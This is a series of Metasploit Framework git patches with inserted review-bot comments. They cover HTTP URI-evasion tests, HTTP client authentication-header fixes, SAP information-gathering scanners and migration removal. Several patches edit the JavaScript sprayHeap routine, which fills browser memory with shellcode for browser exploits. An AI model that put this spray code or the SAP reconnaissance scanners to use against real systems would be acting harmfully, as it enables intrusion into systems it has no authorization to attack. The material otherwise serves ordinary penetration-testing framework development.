+15,30 @@ shared_context "with no evasions" do end end + +shared_context "with 'uri_dir_self_reference'" do + before(:all) do + client_request.opts['uri_dir_self_reference'] = true + end + + it "should have a self reference" do + client_request.send(:set_uri).should == "/./" + end +end + + +shared_context "with 'uri_dir_fake_relative'" do + before(:all) do + client_request.opts['uri_dir_fake_relative'] = true + end + + it "should contain sequences of '../'" do + client_request.send(:set_uri).should include("../") + end + +end + + shared_context "with 'uri_full_url'" do before(:all) do 
@@ -42,9 +57,6 @@ shared_context "with 'uri_full_url'" do context "with ipv6 host" do let(:host) { '2001:DB8::1' } - #before(:each) do - # client_request.opts['vhost'] = "[#{host}]" - #end it_behaves_like "uri_full_url" end @@ -59,7 +71,7 @@ end shared_examples "uri_full_url" do - it "should have the host in the URI" do + it "#set_uri should have the host in the URI" do client_request.send(:set_uri).should start_with("http://#{host}/") end @@ -86,7 +98,6 @@ describe Rex::Proto::Http::ClientRequest do 'vhost' => 'www.example.com', }), { - :set_cgi => { :result => "/" }, :set_uri => { :result => "/" }, :set_method => { :result => "GET" }, :set_version => { :result => "HTTP/1.1\r\n" }, @@ -238,6 +249,7 @@ describe Rex::Proto::Http::ClientRequest do describe "#set_uri" do it_behaves_like "with 'uri_full_url'" it_behaves_like "with 'uri_dir_self_reference'" + it_behaves_like "with 'uri_dir_fake_relative'" it_behaves_like "with no evasions" end From 9f35452d736a723d6fdcf398c0f9993fa2f91ff8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 28 Feb 2013 10:35:40 -0600 Subject: [PATCH 111/139] Beef up the default values for precise alloc size and consistency --- lib/msf/core/exploit/http/server.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 6b5c143a9f..cdde2972f5 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb 
@@ -829,8 +829,8 @@ protected if (shellcode == undefined) { throw "Missing argument: shellcode"; } if (objId == undefined) { throw "Missing argument: objId"; } if (offset == undefined) { offset = 0x104; } - if (heapBlockSize == undefined) { heapBlockSize = 0x40000; } - if (maxAllocs == undefined) { maxAllocs = 0x250; } + if (heapBlockSize == undefined) { heapBlockSize = 0x80000; } + if (maxAllocs == undefined) { maxAllocs = 0x350; } if (browser == undefined) { browser = 'generic'; } if (offset > 0x800) { throw "Bad alignment"; } From 86d78939ad7450488800b0313283c8cbd4101f68 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 28 Feb 2013 11:01:15 -0600 Subject: [PATCH 112/139] Make objId optional --- lib/msf/core/exploit/http/server.rb | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index cdde2972f5..f341663e9a 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -799,9 +799,9 @@ protected # # The "sprayHeap" JavaScript function supports the following arguments: # shellcode => The shellcode to spray in JavaScript. - # objId => The ID for a
HTML tag. # browser => The type of browser to target for precise block size, such as: # 'ie8', 'ie9', 'ie10', and 'generic'. + # objId => Optional. The ID for a
HTML tag. # offset => Optional. Number of bytes to align the shellcode, default: 0x104 # heapBlockSize => Optional. Allocation size, default: 0x40000 # maxAllocs => Optional. Number of allocation calls, default: 0x250 @@ -817,7 +817,9 @@ protected # # def js_property_spray - js = %Q|function sprayHeap( oArg ) { + js = %Q| + var div_container; + function sprayHeap( oArg ) { shellcode = oArg.shellcode; browser = oArg.browser; @@ -827,7 +829,6 @@ protected objId = oArg.objId; if (shellcode == undefined) { throw "Missing argument: shellcode"; } - if (objId == undefined) { throw "Missing argument: objId"; } if (offset == undefined) { offset = 0x104; } if (heapBlockSize == undefined) { heapBlockSize = 0x80000; } if (maxAllocs == undefined) { maxAllocs = 0x350; } @@ -835,7 +836,12 @@ protected if (offset > 0x800) { throw "Bad alignment"; } - var div_container = document.getElementById(objId); + div_container = document.getElementById(objId); + + if (div_container == null) { + div_container = document.createElement("div"); + } + div_container.style.cssText = "display:none"; var data; junk = unescape("%u2020%u2020"); From 2c013cada8959a79ad27f3096e7178502f300b5a Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 28 Feb 2013 11:05:18 -0600 Subject: [PATCH 113/139] Update documentation for default values --- lib/msf/core/exploit/http/server.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index f341663e9a..444173c731 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -803,8 +803,8 @@ protected # 'ie8', 'ie9', 'ie10', and 'generic'. # objId => Optional. The ID for a
HTML tag. # offset => Optional. Number of bytes to align the shellcode, default: 0x104 - # heapBlockSize => Optional. Allocation size, default: 0x40000 - # maxAllocs => Optional. Number of allocation calls, default: 0x250 + # heapBlockSize => Optional. Allocation size, default: 0x80000 + # maxAllocs => Optional. Number of allocation calls, default: 0x350 # # Example of using the 'sprayHeap' function: #
From 722e07702920dc55d8759b635e6c9608707c7687 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 28 Feb 2013 11:09:52 -0600 Subject: [PATCH 114/139] Update generic target --- lib/msf/core/exploit/http/server.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 444173c731..b69acde1f3 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -873,7 +873,7 @@ protected break; case 'generic': - obj.title = data.substring(0, heapBlockSize-0x58); + obj.title = data.substring(0, (heapBlockSize-2)/2); div_container.appendChild(obj); break; From 8cb5da0794415ec3a59578405f4296135bf94c57 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 28 Feb 2013 11:21:23 -0600 Subject: [PATCH 115/139] One size rules them all. --- lib/msf/core/exploit/http/server.rb | 31 ++--------------------------- 1 file changed, 2 insertions(+), 29 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index b69acde1f3..bd0e6f0942 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -799,8 +799,6 @@ protected # # The "sprayHeap" JavaScript function supports the following arguments: # shellcode => The shellcode to spray in JavaScript. - # browser => The type of browser to target for precise block size, such as: - # 'ie8', 'ie9', 'ie10', and 'generic'. # objId => Optional. The ID for a
HTML tag. # offset => Optional. Number of bytes to align the shellcode, default: 0x104 # heapBlockSize => Optional. Allocation size, default: 0x80000 @@ -822,7 +820,6 @@ protected function sprayHeap( oArg ) { shellcode = oArg.shellcode; - browser = oArg.browser; offset = oArg.offset; heapBlockSize = oArg.heapBlockSize; maxAllocs = oArg.maxAllocs; @@ -832,7 +829,6 @@ protected if (offset == undefined) { offset = 0x104; } if (heapBlockSize == undefined) { heapBlockSize = 0x80000; } if (maxAllocs == undefined) { maxAllocs = 0x350; } - if (browser == undefined) { browser = 'generic'; } if (offset > 0x800) { throw "Bad alignment"; } @@ -855,31 +851,8 @@ protected for (var i = 0; i < maxAllocs; i++) { var obj = document.createElement("button"); - switch (browser) - { - case 'ie8': - obj.title = data.substring(0, (heapBlockSize-6)/2); - div_container.appendChild(obj); - break; - - case 'ie9': - obj.title = data.substring(0, (heapBlockSize-2)/2); - div_container.appendChild(obj); - break; - - case 'ie10': - obj.title = data.substring(0, (heapBlockSize-2)/2); - div_container.appendChild(obj); - break; - - case 'generic': - obj.title = data.substring(0, (heapBlockSize-2)/2); - div_container.appendChild(obj); - break; - - default: - throw "Invalid argument"; - } + obj.title = data.substring(0, (heapBlockSize-2)/2); + div_container.appendChild(obj); } } | From 18c0bb0ac8a6d7469e1b3a918fb78a59e7a980b9 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 28 Feb 2013 11:34:48 -0600 Subject: [PATCH 116/139] Updates description again --- lib/msf/core/exploit/http/server.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index bd0e6f0942..8cb75c490a 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -805,13 +805,11 @@ protected # maxAllocs => Optional. Number of allocation calls, default: 0x350 # # Example of using the 'sprayHeap' function: - #
# # def js_property_spray From 0dcfb51071a2d63f9eb9aada22e30310ce632abf Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 28 Feb 2013 18:46:18 +0100 Subject: [PATCH 117/139] cleanup for sap_soap_rfc_system_info --- .../scanner/sap/sap_soap_rfc_system_info.rb | 28 +++++++++---------- 1 file changed, 13 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 1ec8aee729..21100734ee 100755 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -64,13 +64,13 @@ class Metasploit4 < Msf::Auxiliary def report_note_sap(type, data, value) # create note report_note( - :host => rhost, - :port => rport, - :proto => 'tcp', - :sname => 'sap', - :type => type, - :data => data + value - ) if data + :host => rhost, + :port => rport, + :proto => 'tcp', + :sname => 'sap', + :type => type, + :data => data + value + ) if data # update saptbl for output @saptbl << [ data, value ] end @@ -122,14 +122,12 @@ class Metasploit4 < Msf::Auxiliary # create table for output @saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default, - 'Header' => "[SAP] SOAP RFC_SYSTEM_INFO", - 'Prefix' => "\n", - 'Postfix' => "\n", - 'Indent' => 1, - 'Columns' =>[ - "Key", - "Value" - ]) + 'Header' => "[SAP] SOAP RFC_SYSTEM_INFO", + 'Prefix' => "\n", + 'Postfix' => "\n", + 'Indent' => 1, + 'Columns' =>[ "Key", "Value" ] + ) response = res.body From 8f58c7b25e1b3aec8b8e21cb14eb39c4c16aee8c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 28 Feb 2013 18:47:48 +0100 Subject: [PATCH 118/139] cleanup for sap_icf_public_info --- ..._system_info.rb => sap_icf_public_info.rb} | 52 +++++++++---------- 1 file changed, 24 insertions(+), 28 deletions(-) rename modules/auxiliary/scanner/sap/{sap_icf_rfc_system_info.rb => sap_icf_public_info.rb} (82%) 
diff --git a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb similarity index 82% rename from modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb rename to modules/auxiliary/scanner/sap/sap_icf_public_info.rb index ad808d5c43..2095bef790 100644 --- a/modules/auxiliary/scanner/sap/sap_icf_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb @@ -26,26 +26,24 @@ class Metasploit4 < Msf::Auxiliary def initialize super( - 'Name' => 'SAP /sap/public/info RFC_SYSTEM_INFO Function Sensitive Information Gathering', + 'Name' => 'SAP ICF /sap/public/info Service Sensitive Information Gathering', 'Description' => %q{ - This module uses the RFC_SYSTEM_INFO function within SAP Internet Communication + This module uses the /sap/public/info service within SAP Internet Communication Framework (ICF) to obtain the operating system version, SAP version, IP address - and other information through /sap/public/info - + and other information. }, 'Author' => [ - # original sap_soap_rfc_system_info module - 'Agnivesh Sathasivam', - 'nmonkee', - # repurposed for /sap/public/info (non-RFC) - 'ChrisJohnRiley' + 'Agnivesh Sathasivam', # original sap_soap_rfc_system_info module + 'nmonkee', # original sap_soap_rfc_system_info module + 'ChrisJohnRiley' # repurposed for /sap/public/info (non-RFC) ], 'License' => MSF_LICENSE ) register_options( [ - OptString.new('PATH', [true, 'Path to SAP Application Server', '/']) + Opt::RPORT(8000), + OptString.new('TARGETURI', [true, 'Path to SAP Application Server', '/']) ], self.class) end 
@@ -59,23 +57,23 @@ class Metasploit4 < Msf::Auxiliary def report_note_sap(type, data, value) # create note report_note( - :host => rhost, - :port => rport, - :proto => 'tcp', - :sname => 'sap', - :type => type, - :data => data + value - ) if data + :host => rhost, + :port => rport, + :proto => 'tcp', + :sname => 'sap', + :type => type, + :data => data + value + ) if data # update saptbl for output @saptbl << [ data, value ] end def run_host(ip) - print_status("[SAP] #{ip}:#{rport} - Sending RFC_SYSTEM_INFO request to SAP Application Server") - uri = normalize_uri(datastore['PATH'] + '/sap/public/info') + print_status("[SAP] #{ip}:#{rport} - Sending request to SAP Application Server") + uri = normalize_uri(target_uri.path, '/sap/public/info') begin - res = send_request_raw({ 'uri' => uri }, 20) + res = send_request_cgi({ 'uri' => uri }) if res and res.code != 200 print_error("[SAP] #{ip}:#{rport} - Server did not respond as expected") return @@ -93,14 +91,12 @@ class Metasploit4 < Msf::Auxiliary # create table for output @saptbl = Msf::Ui::Console::Table.new( Msf::Ui::Console::Table::Style::Default, - 'Header' => "[SAP] ICF RFC_SYSTEM_INFO", - 'Prefix' => "\n", - 'Postfix' => "\n", - 'Indent' => 1, - 'Columns' =>[ - "Key", - "Value" - ]) + 'Header' => "[SAP] ICF SAP PUBLIC INFO", + 'Prefix' => "\n", + 'Postfix' => "\n", + 'Indent' => 1, + 'Columns' => [ "Key", "Value" ] + ) response = res.body From 5a79fcd11e516c17abaa4ef9a7fce956b31d7518 Mon Sep 17 00:00:00 2001 
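Review bot: The guard `if res and res.code != 200` deliberately lets a nil response (connection refused, read timeout) fall through, and the next hunk's `response = res.body` would then raise NoMethodError unless a nil check sits in the lines between the two hunks, which I cannot see; if there is none, `if res.nil? or res.code != 200` closes that path with the same error message. The begin/rescue wrapping the send_request_cgi call also continues outside the hunk, so whatever it rescues should be checked for covering the nil case rather than only connection errors.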
From: James Lee Date: Thu, 28 Feb 2013 13:47:30 -0600 Subject: [PATCH 119/139] Ensure we build only one Authorization header Also fixes an issue where Host headers were generated with nil by preferring the vhost from Client instead of the default nil from ClientRequest. --- lib/rex/proto/http/client.rb | 58 +++++++------------ lib/rex/proto/http/client_request.rb | 18 +++++- .../lib/rex/proto/http/client_request_spec.rb | 4 +- spec/lib/rex/proto/http/client_spec.rb | 49 ++++++++++++++++ 4 files changed, 89 insertions(+), 40 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index be7b6cb436..38b5c3ac2b 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -38,11 +38,13 @@ class Client self.username = username self.password = password - self.config = { + # Take ClientRequest's defaults, but override with our own + self.config = Http::ClientRequest::DefaultConfig.merge({ 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, - }.merge(Http::ClientRequest::DefaultConfig) + }) + # XXX: This info should all be controlled by ClientRequest self.config_types = { 'uri_encode_mode' => ['hex-normal', 'hex-all', 'hex-random', 'u-normal', 'u-random', 'u-all'], 'uri_encode_count' => 'integer', @@ -104,7 +106,6 @@ class Client self.config[var]=val end - end # @@ -145,12 +146,6 @@ class Client opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' opts['version'] = opts['version'] || config['version'] || '1.1' - opts['client_config'] = self.config - - if opts['basic_auth'] and not opts['authorization'] - opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) - end - req = ClientRequest.new(opts) end 
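Review bot: The new comment on the config merge in Client#initialize says what happens but not why the order matters, and the order is the actual fix: with `Http::ClientRequest::DefaultConfig` as the receiver, the client's `'vhost' => self.hostname` survives, whereas the previous `{...}.merge(DefaultConfig)` let ClientRequest's nil default overwrite it and produced the empty Host header the commit message describes. I would make that explicit so nobody flips it back during a cleanup: `# DefaultConfig must be the receiver: merging it last lets its nil 'vhost' clobber self.hostname (empty Host header)`. The `# XXX` note below it is a fine pointer but could say which keys still live only in config_types.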
@@ -167,28 +162,26 @@ class Client # # @return [ClientRequest] def request_cgi(opts={}) - opts['agent'] ||= config['agent'] - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['ctype'] ||= 'application/x-www-form-urlencoded' - opts['vars_get'] ||= {} - opts['vars_post'] ||= {} + opts['agent'] ||= config['agent'] + opts['basic_auth'] ||= config['basic_auth'] || '' + opts['cookie'] ||= config['cookie'] + opts['ctype'] ||= 'application/x-www-form-urlencoded' + opts['data'] ||= '' + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['raw_headers'] ||= config['raw_headers'] || '' + opts['uri'] ||= '/' + opts['vars_get'] ||= {} + opts['vars_post'] ||= {} + opts['version'] ||= config['version'] || '1.1' + opts['vhost'] ||= config['vhost'] opts['ssl'] = self.ssl opts['cgi'] = true opts['port'] = self.port - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' - - opts['client_config'] = self.config if opts['encode_params'] == true or opts['encode_params'].nil? opts['encode_params'] = true @@ -196,10 +189,6 @@ class Client opts['encode_params'] = false end - if opts['basic_auth'] and not opts['authorization'] - opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) - end - req = ClientRequest.new(opts) end 
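Review bot: `opts['headers'] ||= config['headers'] || {}` stores the Client's own config Hash by reference into the per-request opts, so whenever `config['headers']` has been set, any later in-place write to `opts['headers']` lands in the shared config and is replayed on every subsequent request from that Client; the send_auth change in this same commit does exactly such a write with `opts['headers']['Authorization'] = ...`, though whether that opts has already passed through request_cgi is not visible here. Unless that persistence is intended, `opts['headers'] ||= (config['headers'] || {}).dup` keeps a credential added for one request from leaking into unrelated ones. The same `||=` on `opts['basic_auth']` defaults it to `''`, which Ruby treats as truthy; see the ClientRequest#initialize hunk for where that bites.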
@@ -321,11 +310,8 @@ class Client return res if opts['username'].nil? or opts['username'] == '' supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' - if opts['headers'] - opts['headers']['Authorization'] = basic_auth_header(opts['username'],opts['password'] ) - else - opts['headers'] = { 'Authorization' => basic_auth_header(opts['username'],opts['password'] )} - end + opts['headers'] ||= {} + opts['headers']['Authorization'] = basic_auth_header(opts['username'],opts['password'] ) req = request_cgi(opts) res = _send_recv(req,t,persist) return res diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 62e1ede0e8..039d11559d 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -86,6 +86,12 @@ class ClientRequest def initialize(opts={}) @opts = DefaultConfig.merge(opts) + + # Backwards compatibility for wonky basic authentication api from + # the dawn of time. + if opts['basic_auth'] and not opts['authorization'] + @opts['authorization'] = "Basic #{Rex::Text.encode_base64(opts['basic_auth'])}" + end end def to_s @@ -162,12 +168,18 @@ class ClientRequest req << set_version req << set_host_header - # If an explicit User-Agent header is set, then use that instead of the value of user_agent + # If an explicit User-Agent header is set, then use that instead of + # the default unless opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') req << set_agent_header end - req << set_auth_header + # Similar to user-agent, only add an automatic auth header if a + # manual one hasn't been provided + unless opts['headers'].keys.map{|x| x.downcase }.include?('authorization') + req << set_auth_header + end + req << set_cookie_header req << set_connection_header req << set_extra_headers 
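Review bot: In ClientRequest#initialize the compatibility check `if opts['basic_auth'] and not opts['authorization']` treats an empty string as a present credential, because only nil and false are falsy in Ruby, and request_cgi in this same commit defaults `basic_auth` to `''` when nothing is configured; the result is `@opts['authorization'] = "Basic "` carrying an empty credential for every request built that way. Whether that value reaches the wire depends on set_auth_header, which is outside the hunk, but the guard should be `if opts['basic_auth'] and not opts['basic_auth'].to_s.empty? and not opts['authorization']` so an unset credential never produces an Authorization value. The case-insensitive duplicate check added to to_s is the right shape; it might be worth a one-line comment that explicit `headers` always win over basic_auth/authorization so the precedence is documented where it is enforced.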
@@ -388,7 +400,7 @@ class ClientRequest # def set_host_header return "" if opts['uri_full_url'] - host ||= opts['vhost'] + host = opts['vhost'] # IPv6 addresses must be placed in brackets if Rex::Socket.is_ipv6?(host) diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 426721cb6c..3bf44fcaa4 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb @@ -22,7 +22,8 @@ shared_context "with 'uri_dir_self_reference'" do end it "should have a self reference" do - client_request.send(:set_uri).should == "/./" + client_request.send(:set_uri).should include("/./") + client_request.to_s.should include("/./") end end @@ -34,6 +35,7 @@ shared_context "with 'uri_dir_fake_relative'" do it "should contain sequences of '../'" do client_request.send(:set_uri).should include("../") + client_request.to_s.should include("../") end end diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 11177b90fe..bb2f642e38 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb 
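Review bot: `host = opts['vhost']` still yields nil for a ClientRequest built without a vhost, which the commit message says is ClientRequest's own default (only Client now fills it in), so `Rex::Socket.is_ipv6?(nil)` is evaluated and, depending on the lines below the hunk, an empty `Host:` header may still be emitted for direct users of ClientRequest. A guard such as `return "" if host.nil? or host.to_s.empty?` before the IPv6 check would make the request builder safe on its own rather than relying on Client. set_host_header's body continues past the hunk; the spec hunks only add `to_s` assertions and need nothing further.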
@@ -55,6 +55,55 @@ describe Rex::Proto::Http::Client do it "should produce a CGI HTTP request" do req = cli.request_cgi req.should be_a_kind_of Rex::Proto::Http::ClientRequest + end + + context "with authorization" do + subject(:cli) do + cli = Rex::Proto::Http::Client.new(ip) + cli.set_config({"authorization" => "Basic base64dstuffhere"}) + cli + end + let(:user) { "user" } + let(:pass) { "pass" } + let(:base64) { ["user:pass"].pack('m').chomp } + + context "and an Authorization header" do + before do + cli.set_config({"headers" => { "Authorization" => "Basic #{base64}" } }) + end + it "should have one Authorization header" do + req = cli.request_cgi + match = req.to_s.match("Authorization: Basic") + match.should be + match.length.should == 1 + end + it "should prefer the value in the header" do + req = cli.request_cgi + match = req.to_s.match(/Authorization: Basic (.*)$/) + match.should be + match.captures.length.should == 1 + match.captures[0].chomp.should == base64 + end + end + + context "and basic_auth" do + before do + cli.set_config({"basic_auth" => "user:pass"}) + end + it "should not have two Authorization headers" do + req = cli.request_cgi + match = req.to_s.match("Authorization: Basic") + match.should be + match.length.should == 1 + end + it "should prefer basic_auth" do + req = cli.request_cgi + match = req.to_s.match(/Authorization: Basic (.*)$/) + match.should be + match.captures.length.should == 1 + match.captures[0].chomp.should == base64 + end + end end From 239e1934b8bc8d84b6daa1cbcef29b98aba41575 Mon Sep 17 00:00:00 2001 
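Review bot: `match.length.should == 1` does not check that only one Authorization header was sent: `String#match` returns a MatchData whose length is the number of capture groups plus one, so it is 1 for that pattern however many times the header appears. Counting occurrences, `req.to_s.scan(/^Authorization: Basic/).length.should == 1`, is what the 'should not have two Authorization headers' example actually needs. The 'should prefer basic_auth' example also looks like it passes regardless of precedence, since request_cgi (earlier in this commit) never copies config['authorization'] into the request opts, so the competing "Basic base64dstuffhere" value from set_config never reaches the header; putting the competing value into `headers` instead would make that example meaningful.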
From: Luke Imhoff Date: Fri, 1 Mar 2013 09:03:45 -0600 Subject: [PATCH 120/139] Use migrations from metasploit_data_models [#44034071] metasploit_data_models version 0.5.0 copied the migrations from metasploit-framework/data/sql/migrate to metasploit_data_models/db/migrate so that specs could be written the Mdm models in metasploit_data_models. As part of the specs, :null => false columns that should be :null => true were discovered, so a new migration was added, but to metasploit_data_models/db/migrate, so it could be tested. Instead of replicating migrations back and forth, I'm removing the migrations completely from metasploit-framework and changing the default migration path in Msf::DbManager#migration_paths to MetasploitDataModels.root.join('db', 'migrate'). --- Gemfile | 2 +- Gemfile.lock | 14 +- data/sql/migrate/000_create_tables.rb | 79 --------- data/sql/migrate/001_add_wmap_tables.rb | 35 ---- data/sql/migrate/002_add_workspaces.rb | 36 ---- data/sql/migrate/003_move_notes.rb | 20 --- data/sql/migrate/004_add_events_table.rb | 16 -- data/sql/migrate/005_expand_info.rb | 58 ------- data/sql/migrate/006_add_timestamps.rb | 26 --- data/sql/migrate/007_add_loots.rb | 20 --- data/sql/migrate/008_create_users.rb | 16 -- data/sql/migrate/009_add_loots_ctype.rb | 10 -- data/sql/migrate/010_add_alert_fields.rb | 16 -- data/sql/migrate/011_add_reports.rb | 19 --- data/sql/migrate/012_add_tasks.rb | 24 --- data/sql/migrate/013_add_tasks_result.rb | 10 -- data/sql/migrate/014_add_loots_fields.rb | 12 -- data/sql/migrate/015_rename_user.rb | 16 -- data/sql/migrate/016_add_host_purpose.rb | 10 -- data/sql/migrate/017_expand_info2.rb | 58 ------- .../migrate/018_add_workspace_user_info.rb | 29 ---- data/sql/migrate/019_add_workspace_desc.rb | 23 --- data/sql/migrate/020_add_user_preferences.rb | 11 -- .../migrate/021_standardize_info_and_data.rb | 18 -- data/sql/migrate/022_enlarge_event_info.rb | 10 -- .../migrate/023_add_report_downloaded_at.rb | 10 -- 
.../024_convert_service_info_to_text.rb | 12 -- data/sql/migrate/025_add_user_admin.rb | 19 --- data/sql/migrate/026_add_creds_table.rb | 19 --- .../20100819123300_migrate_cred_data.rb | 154 ------------------ .../20100824151500_add_exploited_table.rb | 16 -- .../20100908001428_add_owner_to_workspaces.rb | 9 - .../20100911122000_add_report_templates.rb | 18 -- .../20100916151530_require_admin_flag.rb | 15 -- ...00916175000_add_campaigns_and_templates.rb | 61 ------- .../20100920012100_add_generate_exe_column.rb | 8 - .../20100926214000_add_template_prefs.rb | 11 -- .../migrate/20101001000000_add_web_tables.rb | 57 ------- data/sql/migrate/20101002000000_add_query.rb | 10 -- .../migrate/20101007000000_add_vuln_info.rb | 15 -- ...20101008111800_add_clients_to_campaigns.rb | 10 -- ...20101009023300_add_campaign_attachments.rb | 15 -- .../20101104135100_add_imported_creds.rb | 17 -- .../migrate/20101203000000_fix_web_tables.rb | 34 ---- .../20101203000001_expand_host_comment.rb | 12 -- ...2033_add_limit_to_network_to_workspaces.rb | 9 - ...20110112154300_add_module_uuid_to_tasks.rb | 9 - .../migrate/20110204112800_add_host_tags.rb | 28 ---- .../20110317144932_add_session_table.rb | 110 ------------- ...414180600_add_local_id_to_session_table.rb | 11 -- .../20110415175705_add_routes_table.rb | 18 -- .../migrate/20110422000000_convert_binary.rb | 72 -------- ...0110425095900_add_last_seen_to_sessions.rb | 8 - ...0110513143900_track_successful_exploits.rb | 31 ---- ...517160800_rename_and_prune_nessus_vulns.rb | 26 --- ...0527000000_add_task_id_to_reports_table.rb | 11 -- .../20110527000001_add_api_keys_table.rb | 12 -- .../20110606000001_add_macros_table.rb | 16 -- ...00_move_old_imported_creds_to_new_files.rb | 127 --------------- ...10622000000_add_settings_to_tasks_table.rb | 12 -- .../20110624000001_add_listeners_table.rb | 19 --- ...0625000001_add_macro_to_listeners_table.rb | 12 -- ...110630000001_add_nexpose_consoles_table.rb | 21 --- 
...0002_add_name_to_nexpose_consoles_table.rb | 12 -- .../20110717000001_add_profiles_table.rb | 15 -- ...20110727163801_expand_cred_ptype_column.rb | 9 - .../20110730000001_add_initial_indexes.rb | 85 ---------- .../migrate/20110812000001_prune_indexes.rb | 23 --- .../migrate/20110922000000_expand_notes.rb | 9 - .../20110928101300_add_mod_ref_table.rb | 17 -- ...10000_add_display_name_to_reports_table.rb | 24 --- .../migrate/20111203000000_inet_columns.rb | 13 -- .../20111204000000_more_inet_columns.rb | 17 -- .../20111210000000_add_scope_to_hosts.rb | 9 - ...0120126110000_add_virtual_host_to_hosts.rb | 9 - ...20120411173220_rename_workspace_members.rb | 9 - ...20601152442_add_counter_caches_to_hosts.rb | 21 --- .../20120625000000_add_vuln_details.rb | 34 ---- .../20120625000001_add_host_details.rb | 16 -- .../migrate/20120625000002_expand_details.rb | 16 -- .../migrate/20120625000003_expand_details2.rb | 24 --- .../20120625000004_add_vuln_attempts.rb | 19 --- ...000005_add_vuln_and_host_counter_caches.rb | 14 -- .../20120625000006_add_module_details.rb | 118 -------------- .../20120625000007_add_exploit_attempts.rb | 26 --- .../20120625000008_add_fail_message.rb | 12 -- ...2805_add_owner_and_payload_to_web_vulns.rb | 13 -- lib/msf/core/db_manager.rb | 6 +- 88 files changed, 13 insertions(+), 2219 deletions(-) delete mode 100755 data/sql/migrate/000_create_tables.rb delete mode 100755 data/sql/migrate/001_add_wmap_tables.rb delete mode 100755 data/sql/migrate/002_add_workspaces.rb delete mode 100755 data/sql/migrate/003_move_notes.rb delete mode 100755 data/sql/migrate/004_add_events_table.rb delete mode 100755 data/sql/migrate/005_expand_info.rb delete mode 100755 data/sql/migrate/006_add_timestamps.rb delete mode 100755 data/sql/migrate/007_add_loots.rb delete mode 100755 data/sql/migrate/008_create_users.rb delete mode 100755 data/sql/migrate/009_add_loots_ctype.rb delete mode 100755 data/sql/migrate/010_add_alert_fields.rb delete mode 100755 
